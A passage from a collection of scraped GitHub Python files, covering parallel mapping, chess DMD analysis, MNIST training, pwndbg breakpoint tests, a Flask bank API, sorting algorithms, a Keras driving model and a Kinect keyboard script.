print(i)\nprint('\\n')\n\nprint('Threads limited to 4 (task will take 2 seconds instead of 1)')\n# 8 threads in total will be used.\n# On 4 core cpu, 1 thread will be spawned in each process.\nfor i in fast_map(io_and_cpu_expensive_function, range(8), threads_limit=4):\n print(i)\nprint('\\n')\n\n\ndef task_with_multiple_params(a, b):\n return a + ' - ' + b\n\nprint('Using function with multiple parameters:')\nfor s in fast_map(task_with_multiple_params, ['apple', 'banana', 'cherry'], ['orange', 'lemon', 'pineapple']):\n print(s)\n","repo_name":"michalmonday/fast_map","sub_path":"examples/fast_map_usage.py","file_name":"fast_map_usage.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"78"} +{"seq_id":"7447269800","text":"from board_matrix import sparse_to_board_vector\nfrom data import read_h5\nfrom dmd import DMDAnalyzer \n\nimport numpy as np\nfrom typing import List, Tuple\n\ndef create_snapshot_matrix(sparse_matrices: List[List[Tuple[int, int]]]) -> np.ndarray:\n n = len(sparse_matrices)\n snapshot_matrix = np.zeros((64, n), dtype=int)\n for i, sparse_matrix in enumerate(sparse_matrices):\n board_vector = sparse_to_board_vector(sparse_matrix)\n snapshot_matrix[:, i] = board_vector\n return snapshot_matrix\n\nif __name__ == \"__main__\":\n sparse_matrices = read_h5()\n\n # Initialize the DMD Analyzer\n dmd_analyzer = DMDAnalyzer(rank=50)\n \n for matrix in sparse_matrices[:5]:\n # Create the snapshot matrix\n snapshot_matrix = create_snapshot_matrix(matrix)\n \n # Fit the DMD model to the snapshot matrix\n dmd_analyzer.fit(snapshot_matrix)\n \n # Visualize the DMD modes\n dmd_analyzer.plot_modes()\n \n # Predict future states for 10 time steps\n initial_condition = snapshot_matrix[:, 0]\n future_states = dmd_analyzer.apply(initial_condition, 10)","repo_name":"joseph-crowley/chess","sub_path":"simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35133769245","text":"# test out neural network on MNIST\nimport numpy as np \nimport pandas as pd \n\nfrom lexnet.utils import sigmoid, dsigmoid, relu \nfrom lexnet.utils import ms_loss, dms_loss, grad_descent_simple \nfrom lexnet.utils import label_to_onehot, accuracy\n\nfrom lexnet import Net\n\n# MNIST data folder\nsource_folder = '/home/alex/Desktop/Data/MNIST'\n\n# load up the CSV files for the MNIST\ndf_train = pd.read_csv(f'{source_folder}/mnist_train.csv', header=None)\ndf_test = pd.read_csv(f'{source_folder}/mnist_test.csv', header=None)\n\n# extract the values for training and test sets and convert to np.array\nX_train, y_train = df_train.values[:, 1:].T, df_train.values[:, 0]\nX_test, y_test = df_test.values[:, 1:].T, df_test.values[:, 0]\n\n# scale the image values\nX_train = X_train / 255\nX_test = X_test / 255\n\n# convert the labels to one-hot vectors\n# training data\nY_train = np.concatenate([label_to_onehot(label, 10) for label in y_train], axis=1)\n# test data\nY_test = np.concatenate([label_to_onehot(label, 10) for label in y_test], axis=1)\n\n# neural network hyper parameters\nlayers = [784, 32, 10]\nactivations = [sigmoid, sigmoid, sigmoid]\nnet1 = Net(layers, activations, 'ce_loss')\nnum_epochs = 32\nbatch_size = 64\nepsilon = 5e-4\n\n# gradient descent on the neural net\nlosses = net1.train([X_train, X_test], [Y_train, Y_test], num_epochs, batch_size, epsilon)","repo_name":"ajl2718/lexnet","sub_path":"mnist_test.py","file_name":"mnist_test.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72744459131","text":"from __future__ import annotations\n\nimport gdb\n\nimport pwndbg\nimport tests\n\nREFERENCE_BINARY = tests.binaries.get(\"reference-binary.out\")\n\n\ndef test_command_ignore_no_breakpoint_set():\n out = gdb.execute(\"ignore 1001\", to_string=True)\n assert out == \"No breakpoints set.\\n\"\n\n\ndef test_command_ignore_no_breakpoint_set_remove():\n gdb.execute(\"file \" + REFERENCE_BINARY)\n gdb.execute(\"break break_here\")\n gdb.execute(\"delete 1\")\n out = gdb.execute(\"ignore 1001\", to_string=True)\n assert out == \"No breakpoints set.\\n\"\n\n\ndef test_command_ignore_no_breakpoint_found(start_binary):\n start_binary(REFERENCE_BINARY)\n\n gdb.execute(\"break main\")\n out = gdb.execute(\"ignore 2 1001\", to_string=True)\n assert out == \"No breakpoint number 2.\\n\"\n\n\ndef test_command_ignore_breakpoint_last_found_one():\n gdb.execute(\"file \" + REFERENCE_BINARY)\n gdb.execute(\"break break_here\")\n\n out = gdb.execute(\"ignore 1\", to_string=True)\n assert out == \"Will ignore next 1 crossings of breakpoint 1.\\n\"\n\n gdb.execute(\"run\")\n assert not pwndbg.gdblib.proc.alive\n\n gdb.execute(\"run\")\n assert pwndbg.gdblib.proc.alive\n\n\ndef test_command_ignore_breakpoint_last_found_two():\n gdb.execute(\"file \" + REFERENCE_BINARY)\n gdb.execute(\"break break_here\")\n gdb.execute(\"break main\")\n\n out = gdb.execute(\"ignore 15\", to_string=True)\n assert out == \"Will ignore next 15 crossings of breakpoint 2.\\n\"\n\n\ndef test_command_ignore_breakpoint_last_negative():\n gdb.execute(\"file \" + REFERENCE_BINARY)\n gdb.execute(\"break break_here\")\n\n out = gdb.execute(\"ignore -100\", to_string=True)\n assert out == \"Will ignore next 0 crossings of breakpoint 1.\\n\"\n","repo_name":"pwndbg/pwndbg","sub_path":"tests/gdb-tests/tests/test_command_ignore.py","file_name":"test_command_ignore.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":6166,"dataset":"github-code","pt":"78"} +{"seq_id":"14175946965","text":"import pickle\n\ndirect = 'Python/lecture/Lesson008'\ndef func(a, b, c):\n return a + b + c\nmy_dict = {\n \"numbers\": [42, 4.1415, 7+3j],\n \"functions\": (func, sum, max),\n \"others\": {True, False, 'Hello world!'},\n }\n\nwith open(f'{direct}/my_dict.pickle', 'wb') as f:\n pickle.dump(my_dict, f)","repo_name":"ArtemErmilov/Python_Web_Development","sub_path":"Python/lecture/Lesson008/lect_less08_task16.py","file_name":"lect_less08_task16.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70274456254","text":"import pandas as pd\n\nprint('Loading...')\n\npredictions = pd.read_csv('../../dist/model_04_01_22/pre_submit.csv')\npredictions = predictions[['customer_id', 'article_id', 'rank']]\n\npopular = pd.read_csv('../../dist/model_04_01_22/popular_items.csv')\npopular = popular.loc[:1, ['article_id', 'total']]\n\nprint('Loaded...')\n\npredictions = predictions.groupby('customer_id')[['article_id']].agg(lambda x: list(x)).reset_index()\npredictions['article_id'] = predictions['article_id'].apply(lambda x: ' '.join(map(str, x + popular['article_id'].to_list())))\n\npredictions = predictions.rename(columns={'article_id': 'prediction'})\n\nprint('Writing...')\n\npredictions.to_csv('../../dist/model_04_01_22/submission.csv', index=False)\n\nprint('Done...')","repo_name":"bswaika/csci_567_final_project","sub_path":"src/model_04_01_22/format_predictions.py","file_name":"format_predictions.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20688081886","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\n\r\nfrom django.db import migrations, models\r\nimport django.db.models.deletion\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('defensor', '0009_auto_20180510_1526'),\r\n ('atendimento', '0051_impedimento_anotacao_comunicacao'),\r\n ('assistido', '0016_pessoa_tipo_cadastro'),\r\n ('core', '0001_initial'),\r\n ]\r\n\r\n operations = [\r\n migrations.CreateModel(\r\n name='Indeferimento',\r\n fields=[\r\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\r\n ('medida_pretendida', models.TextField(null=True, blank=True)),\r\n ('justificativa', models.TextField(null=True, blank=True)),\r\n ('resultado', models.SmallIntegerField(default=0, null=True, blank=True, choices=[(0, 'N\\xe3o Avaliado'), (10, 'Deferido'), (20, 'Indeferido')])),\r\n ('tipo_baixa', models.SmallIntegerField(default=0, null=True, blank=True, choices=[(0, 'N\\xe3o Realizada'), (10, 'Retorno Marcado'), (20, 'Encaminhamento Marcado'), (30, 'Atendimento Negado')])),\r\n ('atendimento', models.ForeignKey(related_name='indeferimentos', on_delete=django.db.models.deletion.DO_NOTHING, to='atendimento.Defensor')),\r\n ('defensor', models.ForeignKey(related_name='indeferimentos', on_delete=django.db.models.deletion.DO_NOTHING, to='defensor.Defensor')),\r\n ('pessoa', models.ForeignKey(related_name='indeferimentos', on_delete=django.db.models.deletion.DO_NOTHING, to='assistido.PessoaAssistida')),\r\n ('processo', models.OneToOneField(related_name='indeferimento', on_delete=django.db.models.deletion.DO_NOTHING, to='core.Processo')),\r\n ],\r\n ),\r\n ]\r\n","repo_name":"SegurancaDPDF/SOLAR-Backend","sub_path":"indeferimento/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9305615884","text":"from typing import Dict, List\nfrom flask import Flask, jsonify\nfrom flask_restful import Resource, Api, reqparse\nfrom IPython import embed\nfrom interfaces import Conta\nfrom mensagens import Mensagens\n\nAPP = Flask(__name__)\nAPI = Api(APP)\n\nPARSER = reqparse.RequestParser()\nPARSER.add_argument('saque', type=float)\nPARSER.add_argument('valor', type=float)\nPARSER.add_argument('saldo_inicial', type=float)\n\nCONTAS = {\n 'conta1': Conta(1, 300.0),\n 'conta2': Conta(2, 750.99),\n 'conta3': Conta(3, 70.50),\n}\n\n\ndef conta_existe(id: int, contas: List[Dict]) -> bool:\n key = f'conta{id}'\n return contas.get(key) != None\n\n\ndef get_conta(id: int, contas: List[Dict]) -> Conta:\n return contas.get(f'conta{id}')\n\n\ndef get_max_id(contas: List[Dict]) -> int:\n return max(list(map(lambda x: int(x.split('conta')[1]), contas)))\n\n\nclass Contas(Resource):\n def get(self):\n return [data.__dict__ for _, data in CONTAS.items()]\n\n def post(self):\n id = get_max_id(CONTAS) + 1\n CONTAS[f'conta{id}'] = Conta(id, 0.0)\n\n return CONTAS[f'conta{id}'].__dict__\n\n\nclass ContaResource(Resource):\n def get(self, id: int):\n if conta_existe(id, CONTAS):\n return get_conta(id, CONTAS).__dict__\n\n return Mensagens.INEXISTENTE(id)\n\n def delete(self, id: int):\n if conta_existe(id, CONTAS):\n CONTAS.pop(f'conta{id}')\n return Mensagens.REMOVIDO(id)\n\n return Mensagens.INEXISTENTE(id)\n\n def patch(self, id: int):\n response = Mensagens.INEXISTENTE(id)\n\n if conta_existe(id, CONTAS):\n args = PARSER.parse_args()\n conta = get_conta(id, CONTAS)\n \n saque = args['saque']\n valor = args['valor']\n\n if saque == True:\n response = conta.saque(valor)\n else:\n response = conta.deposito(valor)\n\n return response\n\n\n@APP.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Origin', '*')\n response.headers.add('Access-Control-Allow-Headers',\n 'Origin, Content-Type')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PUT, PATCH, POST, DELETE')\n return response\n\n\nRESOURCES = [\n (Contas, '/contas'),\n (ContaResource, '/contas/'),\n]\n\nif __name__ == '__main__':\n for resource, endpoint in RESOURCES:\n API.add_resource(resource, endpoint)\n\n APP.run(debug=True)\n","repo_name":"SuxPorT/contas-bancarias-rws","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33295579264","text":"from Library_py.DataStructures.SegmentTree.SegmentTree import SegmentTree\nfrom Library_py.Graph.HLD.HLD import HLD\nfrom typing import Union, Iterable, Callable, TypeVar, Generic, List\nT = TypeVar('T')\n\nclass HLDNoncommutativeSegmentTree(Generic[T]):\n\n def __init__(self, hld: HLD, n_or_a: Union[int, Iterable[T]], op: Callable[[T, T], T], e: T):\n self.hld: HLD = hld\n a = [e] * n_or_a if isinstance(n_or_a, int) else self.hld.build_list(list(n_or_a))\n self.seg: SegmentTree[T] = SegmentTree(a, op, e)\n self.rseg: SegmentTree[T] = SegmentTree(a[::-1], op, e)\n self.op: Callable[[T, T], T] = op\n self.e: T = e\n\n def path_prod(self, u: int, v: int) -> T:\n head, nodein, dep, par, n = self.hld.head, self.hld.nodein, self.hld.dep, self.hld.par, self.hld.n\n lres, rres = self.e, self.e\n seg, rseg = self.seg, self.rseg\n while head[u] != head[v]:\n if dep[head[u]] > dep[head[v]]:\n lres = self.op(lres, rseg.prod(n-nodein[u]-1, n-nodein[head[u]]))\n u = par[head[u]]\n else:\n rres = self.op(seg.prod(nodein[head[v]], nodein[v]+1), rres)\n v = par[head[v]]\n if dep[u] > dep[v]:\n lres = self.op(lres, rseg.prod(n-nodein[u]-1, n-nodein[v]))\n else:\n lres = self.op(lres, seg.prod(nodein[u], nodein[v]+1))\n return self.op(lres, rres)\n\n def get(self, k: int) -> T:\n return self.seg[self.hld.nodein[k]]\n\n def set(self, k: int, v: T) -> None:\n self.seg[self.hld.nodein[k]] = v\n self.rseg[self.hld.n-self.hld.nodein[k]-1] = v\n\n __getitem__ = get\n __setitem__ = set\n\n","repo_name":"titanium-22/Library_py","sub_path":"Graph/HLD/HLDNoncommutativeSegmentTree.py","file_name":"HLDNoncommutativeSegmentTree.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"72015779464","text":"import csv\nimport time\nimport cv2\nimport numpy as np\nimport tensorflow as tf\ntf.python.control_flow_ops = tf\n\n# Read in .csv file containing references to training imagery and steering data\nlines = []\nwith open('newlog.csv') as csvfile:\n reader = csv.reader(csvfile)\n numLines = 0\n for line in reader:\n if numLines == 0:\n numLines += 1 # Don't process first line with header text in fields\n else:\n numLines += 1\n lines.append(line)\n\nlocaltime = time.asctime(time.localtime(time.time()))\nprint(localtime, \"Number of lines read from .csv input file:\", str(len(lines)))\n\n# Read in the image file paths, along with associated steering measurements\n# from each line in input training data file, and store them in images\n# and measurements lists.\nimages = []\nmeasurements = []\n#evenLine = True\n#numLines = 0\nfor line in lines:\n path = line[0]\n image = cv2.imread(path)\n measurement = float(line[3])\n# Code below, to flip every other image, is commented out, as it did not help performance\n# of the model during test runs.\n# Flip every other image, so as to reduce \"left turn bias\"\n# numLines += 1\n# if evenLine:\n# evenLine = False\n# else:\n# evenLine = True\n# image = np.fliplr(image)\n# measurement = -measurement\n images.append(image)\n measurements.append(measurement)\n\n# Put the training data into X_train and y_train numpy arrays,\n# as required by Keras(and underlying TensorFlow) model.fit() method.\ny_train = np.array(measurements)\nX_train = np.array(images)\nlocaltime = time.asctime(time.localtime(time.time()))\nprint (localtime, \"X_train & y_train np.array structures created, defining Keras NN model\")\n\n# Keras library module imports\nfrom keras.models import Sequential\nfrom keras.layers import Lambda\nfrom keras.layers.core import Dense, Flatten\nfrom keras.layers.convolutional import Convolution2D, Cropping2D\n\n# Implement Keras Neural Network, based on NVIDIA CNN architecture\n# described in the paper: arXiv.1604.073116v1 [cs.CV] 25 Apr 2016\n# - Lambda layer provides image normalization.\n# - Python generator not used, as training this model with 5 Epochs produces\n# great results at only ~58 seconds per epoch on a GTX1060 graphics card;\n# so the extra complexity is not warrented.\n# - Over-fitting is avoided by keeping training passes to about 5 Epochs,\n# when using less than 10,000 training data samples.\n# - Adam Optimizer used to auto-tune learning rate parameters during training.\nmodel = Sequential()\nmodel.add(Lambda(lambda x: (x / 255.0) - 0.5, input_shape=(160,320,3)))\nmodel.add(Cropping2D(cropping=((70,25),(0,0))))\nmodel.add(Convolution2D(24, 5, 5, subsample=[2,2], activation='relu'))\nmodel.add(Convolution2D(36, 5, 5, subsample=[2,2], activation='relu'))\nmodel.add(Convolution2D(48, 5, 5, subsample=[2,2], activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, activation='relu'))\nmodel.add(Flatten())\nmodel.add(Dense(100, activation='relu'))\nmodel.add(Dense(50, activation='relu'))\nmodel.add(Dense(10, activation='relu'))\nmodel.add(Dense(1, activation='tanh'))\n\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit(X_train, y_train, nb_epoch=5, validation_split=0.2, shuffle=True)\n\nmodel.save('model.h5')\n","repo_name":"blunderbuss9/CarND-P3-BC-StewartTeaze","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27329950260","text":"#**************bubble***************\r\ndef bubble_sort(A, n):\r\n comparisons = 0 #comparison counter\r\n for k in range(0, n-1): # Iterate through the array n-1 times, where n is the length of the array,\r\n for i in range(0, n-1):\r\n comparisons += 1 #for each comparison increment \r\n if A[i] > A[i+1]: #Comparing the indexes\r\n A[i], A[i+1] = A[i+1], A[i] #swapping the indexes \r\n return A, comparisons\r\n\r\n#**************bubble2***************\r\ndef bubble_sort2(A, n):\r\n comparisons = 0 #comparison counter\r\n for k in range(0, n-1): # Iterate through the array n-1 times, where n is the length of the array\r\n for i in range(0, n-k-1): # The inner loop ends at n-k-1 because the k largest elements are already in their correct positions\r\n comparisons += 1 #for each comparison increment \r\n if A[i] > A[i+1]: #Comparing the indexes\r\n A[i], A[i+1] = A[i+1], A[i] #swapping the indexes \r\n return A, comparisons\r\n\r\n\r\n#**************bubble3***************\r\ndef bubble_sort3(A, n):\r\n comparisons = 0\r\n for k in range(0, n-1):\r\n flag = 0\r\n for i in range(0, n-1):\r\n comparisons += 1\r\n if A[i] > A[i+1]: #Comparing the indexes\r\n A[i], A[i+1] = A[i+1], A[i] #swapping the indexes \r\n flag = 1 #if flag = 1 then continue the program as the array is not sorted \r\n if flag == 0: #if flag == 0 that means its all sorted and it will terminate early (no swaps wore made)\r\n break\r\n return A, comparisons\r\n\r\n#**************bubble4***************\r\n#Essentially the same comments as the functions above\r\ndef bubble_sort4(A, n):\r\n comparisons = 0\r\n for k in range(0, n-1):\r\n flag = 0\r\n for i in range(0, n-k-1):\r\n comparisons += 1\r\n if A[i] > A[i+1]:\r\n A[i], A[i+1] = A[i+1], A[i]\r\n flag = 1\r\n if flag == 0:\r\n break\r\n return A, comparisons\r\n\r\n#**************sink***************\r\ndef SinkDownSort(A, n):\r\n comparisons = 0\r\n for k in range(n-1, 0, -1): #decrement by 1 as sink down sort goes backwards \r\n flag = 0\r\n for i in range(0, k): \r\n comparisons += 1\r\n if A[i] > A[i+1]: #comparing indexes \r\n A[i], A[i+1] = A[i+1], A[i] #swapping indexes \r\n flag = 1 #if flag = 1 then continue the program as the array is not sorted \r\n if flag == 0: #if flag == 0 that means its all sorted and it will terminate early (no swaps wore made)\r\n break\r\n return A, comparisons\r\n\r\n#**************bidirectsort***************\r\ndef BiDirectSort(A, n):\r\n comparisons = 0\r\n for k in range(n//2): #The array is split into two sub arrays and the sorting for each sub array will be performed during each iteration \r\n left_flag = False\r\n right_flag = False\r\n for i in range(k, n-k-1): #scan left\r\n if A[i] > A[i+1]: #comparing the first half of the indexes \r\n A[i], A[i+1] = A[i+1], A[i] #swapping the indexes \r\n left_flag = True\r\n comparisons += 1\r\n for i in range(n-k-2, k, -1): #scan right \r\n if A[i] < A[i-1]: #comparing the second half of the indexes \r\n A[i], A[i-1] = A[i-1], A[i] #swapping the indexes \r\n right_flag = True\r\n comparisons += 1\r\n if not left_flag and not right_flag: #checking if any swaps wore made if not then break (terminate early)\r\n break\r\n return A, comparisons\r\n\r\n#**************selection***************\r\ndef selectionSort(A, n):\r\n comparisons = 0 #comparison counter\r\n for i in range(0, n-1): #iterate over the array except the last element\r\n imin = i #set the index of the minimum value to the current index i\r\n for j in range(i+1, n): #iterate over the remaining unsorted elements in the array\r\n if A[j] < A[imin]: #compare the value of the current element to the minimum value\r\n imin = j #if current element is less than minimum value, update index of minimum value\r\n comparisons += 1 #increment comparison counter for each comparison made\r\n A[i], A[imin] = A[imin], A[i] #swap indexes \r\n return A, comparisons\r\n \r\n#**************insertion*************** \r\ndef insertionSort(A, n):\r\n comparisons = 0 #comparison counter\r\n for i in range(1, n): #iterate through the array starting from the second element\r\n value = A[i] #set the value of the current element\r\n hole = i #set the index of the current element \r\n while(hole > 0 and A[hole-1] > value): #compare the value with the elements to the left\r\n A[hole] = A[hole-1] #shift the greater elements to the right\r\n hole = hole - 1 #decrement the hole index\r\n comparisons += 1 #increment the comparison counter\r\n A[hole] = value #insert the value in the correct position\r\n return A, comparisons\r\n\r\n\r\n#**************quick sort***************\r\ndef partition(A, start, end):\r\n pivot = A[end] #Selecting the pivot element as the last element in the array\r\n pindex = start #Initializing the pivot index to the start of the array\r\n comparisons = 0 #Initializing the comparison counter\r\n for i in range(start, end): #Iterating over the array from start to end\r\n comparisons += 1 #Incrementing the comparison counter for each comparison\r\n if A[i] <= pivot: #If the current element is less than or equal to the pivot element\r\n A[i], A[pindex] = A[pindex], A[i] #Swap the current element with the element at pivot index\r\n pindex += 1 \r\n A[end], A[pindex] = A[pindex], A[end] #Finally, swap the pivot element with the element at pivot index\r\n return pindex, comparisons\r\n\r\ndef quicksort(A, start, end, n):\r\n comparisons = 0 #Initializing the comparison counter\r\n if start < end: #If there are more than one elements in the array\r\n pindex, comp1 = partition(A, start, end) #Perform partitioning and get the pivot index and the number of comparisons made\r\n comparisons += comp1 #Add the number of comparisons made during partitioning to the total comparison count\r\n quicksort(A, start, pindex-1, n) #Recursively sort the left sub array (its recursive because we are calling the quicksort function within itself)\r\n quicksort(A, pindex+1, end, n) #Recursively sort the right sub array\r\n return A, comparisons\r\n#***************************************\r\n\r\n\r\n#**************merge sort***************\r\ndef merge(L,R,A):\r\n nL = len(L) #length of left subarray\r\n nR = len(R) #length of right subarray\r\n j, i, k = 0, 0, 0 #initialize indices for left, right and merged arrays\r\n num_comparisons = 0 #counter variable for comparisons\r\n while(i < nL and j < nR): #merge until either subarray cant anymore\r\n num_comparisons += 1 #increment counter for comparison\r\n if(L[i] <= R[j]): #compare left and right elements\r\n A[k] = L[i] #copy smaller element to merged array\r\n i+=1 #move to next element in left subarray\r\n else:\r\n A[k] = R[j] #copy smaller element to merged array\r\n j+=1 #move to next element in right subarray\r\n k+=1 \r\n while(i < nL): #copy remaining elements in left subarray\r\n A[k] = L[i]\r\n i+=1 \r\n k+=1 \r\n while(j < nR): #copy remaining elements in right subarray\r\n A[k] = R[j]\r\n j+=1 \r\n k+=1 \r\n return num_comparisons\r\n\r\ndef MergeSort(A, n):\r\n num = len(A) #length of input array\r\n if(num < 2):\r\n return A, 0 #return 0 comparisons for single element arrays\r\n mid = num // 2 #calculate midpoint of input array entered by user\r\n left = []\r\n right = []\r\n for i in range(0, mid):\r\n left.append(A[i])\r\n for i in range(mid, n):\r\n right.append(A[i])\r\n left, lcomp = MergeSort(left, len(left)) #recursively sort left subarray\r\n right, rcomp = MergeSort(right, len(right)) #recursively sort right subarray\r\n merge_comp = merge(left, right, A) #merge sorted left and right subarrays\r\n num_comparisons = lcomp + rcomp + merge_comp #total comparisons made in this sorting operation\r\n return A, num_comparisons\r\n#***************************************\r\n\r\n#**************heap sort***************\r\ndef heap_sort(arr, n):\r\n comparisons = 0\r\n \r\n #Build max heap\r\n for i in range(n // 2 - 1, -1, -1):\r\n heapify(arr, n, i, comparisons)\r\n \r\n #Extract elements from heap one by one\r\n for i in range(n - 1, 0, -1):\r\n arr[0], arr[i] = arr[i], arr[0] #swap\r\n heapify(arr, i, 0, comparisons)\r\n \r\n return arr, comparisons\r\n\r\ndef heapify(arr, n, i, comparisons):\r\n largest = i #Initialize largest as root\r\n left = 2 * i + 1 #left child\r\n right = 2 * i + 2 #right child\r\n \r\n #if left child is larger than root\r\n if left < n and arr[left] > arr[largest]:\r\n largest = left\r\n \r\n #if right child is larger than largest so far\r\n if right < n and arr[right] > arr[largest]:\r\n largest = right\r\n \r\n #if largest is not root\r\n if largest != i:\r\n arr[i], arr[largest] = arr[largest], arr[i] # swap\r\n comparisons += 1\r\n heapify(arr, n, largest, comparisons)\r\n#***************************************\r\n","repo_name":"petaravramoski/Sorting-Algorithms-Comparison","sub_path":"sorting_algorithms.py","file_name":"sorting_algorithms.py","file_ext":"py","file_size_in_byte":9390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17971111994","text":"import sys\nfrom time import sleep\nfrom classroom import *\ninp = sys.argv[1].upper()\n\nif inp in classes:\n open_link(classes[inp])\nelif inp == 'TODAY' or inp == '-T':\n print()\n classes_today()\nelif inp == 'HELP' or inp == '-H':\n help_menu()\nelif inp == 'AUTOMATE' or inp == '-A':\n subs = find_classes()\n c = 0\n while True:\n if c == 1:\n break\n time = datetime.now().time()\n time = str(time).split(':')\n print(time)\n ['08', '57', '29.790054']\n for i in subs:\n print('Executando')\n if time[0] == i[0] and time[1] == i[3:5] and 'INTERVALO' in i:\n print('Caiu no if')\n open_link(classes[i[25:]])\n print('Opened ' + i[25:] + ' link')\n if i == subs[-1]:\n c = 1\n break\n sleep(3600)\n break\nelse:\n print('\\n' + '\\t' + 'Invalid command')\n print('\\n' + '\\t' + 'Try class -h for help menu')","repo_name":"jorgelisboa/classroom_bot","sub_path":"aula.py","file_name":"aula.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"32679432293","text":"import pygame\nimport cell as cell\n\n# set up the display\nWIDTH = 500\nWIN = pygame.display.set_mode((WIDTH, WIDTH))\npygame.display.set_caption(\"A* Path Finding Algorithm\")\n\n\n# main function\ndef main(win, width):\n # make the grid\n ROWS = 50\n grid = cell.make_grid(ROWS, width)\n\n # define the start and end position\n start = None\n end = None\n\n run = True\n started = False\n\n while run:\n # draw everything\n cell.draw(win, grid, ROWS, width)\n\n # loop through all the events and check what they are\n for event in pygame.event.get():\n # stop running the game if x is pressed\n if event.type == pygame.QUIT:\n run = False\n\n # if the left mouse button was pressed\n if pygame.mouse.get_pressed()[0]:\n pos = pygame.mouse.get_pos()\n row, col = cell.get_clicked_pos(pos, ROWS, width)\n spot = grid[row][col]\n\n # if click did not set start position\n if not start and spot != end:\n # set start position\n start = spot\n start.make_start()\n \n # if click did not set end position\n elif not end and spot != start:\n # set end position\n end = spot\n end.make_end()\n\n # if click did not set start of end position\n elif spot != end and spot != end:\n # create a barrier\n spot.make_barrier() \n\n # if the right mouse button was pressed\n elif pygame.mouse.get_pressed()[2]:\n pos = pygame.mouse.get_pos()\n row, col = cell.get_clicked_pos(pos, ROWS, width)\n\n # erase whatever is clicked\n spot = grid[row][col]\n spot.reset()\n\n # erase the start position\n if spot == start:\n start = None\n \n # erase the end position\n elif spot == end:\n end = None\n \n # if a key has been pressed\n if event.type == pygame.KEYDOWN:\n # if the spacebar was pressed and algorithm has not started yet\n if event.key == pygame.K_SPACE and start and end:\n # update all neighbours of all the spots\n for row in grid:\n for spot in row:\n spot.update_neighbors(grid)\n \n # apply the a* algorithm\n cell.algorithm(lambda: cell.draw(win, grid, ROWS, width), grid, start, end)\n \n # if c is pressed\n if event.key == pygame.K_c:\n # clear the grid and reset everything\n start = None\n end = None\n grid = cell.make_grid(ROWS, width)\n\n \n pygame.quit()\n\nmain(WIN, WIDTH)\n\n\n","repo_name":"yasbik/A_star-Pathfinder","sub_path":"src/astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73221875786","text":"import cv2 as cv\nimport numpy as np\nfrom freenect import sync_get_video, sync_get_depth\nimport fluidsynth\n\n############### TODO ###############\n# Adicionar mais teclas\n# Cara, na boa, será que fluidsynth é o melhor MIDI player de python mesmo? Duvido um pouco mas tá bom\n# Cada tecla ter uma nota diferente\n# Definir automaticamente tamanho maneiro para cada tecla\n# Normalizar valor da margem (i.e. Vai que dá alguma interferenciazinhainha)\n\n#Função para pegar profundidade do Kinect\ndef get_depth():\n array,_ = sync_get_depth()\n array = array.astype(np.uint16)\n return array\n\n#Função para pegar vídeo do Kinect\ndef get_video():\n array,_ = sync_get_video()\n array = cv.cvtColor(array,cv.COLOR_RGB2BGR)\n return array\n\n# Desenha retângulo \ndef desenhar(event, x, y, flags, param):\n global ret0, ret1, keyboard, depth, holding, margem\n if event == cv.EVENT_LBUTTONDOWN:\n holding = True\n ret0 = [x, y]\n if event == cv.EVENT_LBUTTONUP:\n if holding:\n ret1 = [x, y]\n if ret0[0] > ret1[0]:\n ret0, ret1 = ret1, ret0\n keyboard = depth[ret0[1]:ret1[1], ret0[0]:ret1[0]]\n margem = np.sum(np.add(keyboard,keyboard * 0.015))\n holding = False\n\nclass Tecla():\n def __init__(self):\n global ret0, ret1\n self.area = np.zeros((0,0))\n self.cor = (255,0,128)\n self.ret = [ret0,ret1]\n \n # Verifica se a tecla foi apertada\n def apertou(self):\n global margem\n return np.sum(self.area) > margem\n \n # Toca a nota da tecla\n def tocar(self):\n pass\n\n # Mostra o retângulo da tecla no visualizador do OpenCV\n def render(self):\n global img\n cv.rectangle(img,(self.ret[0][0],self.ret[0][1]),(self.ret[1][0],self.ret[1][1]),self.cor,2)\n \n # Atualiza o campo de interesse\n def atualizaArea(self, depth):\n key.area = depth[self.ret[0][1]:self.ret[1][1], self.ret[0][0]:self.ret[1][0]]\n\nif __name__ == '__main__':\n\n fs = fluidsynth.Synth()\n 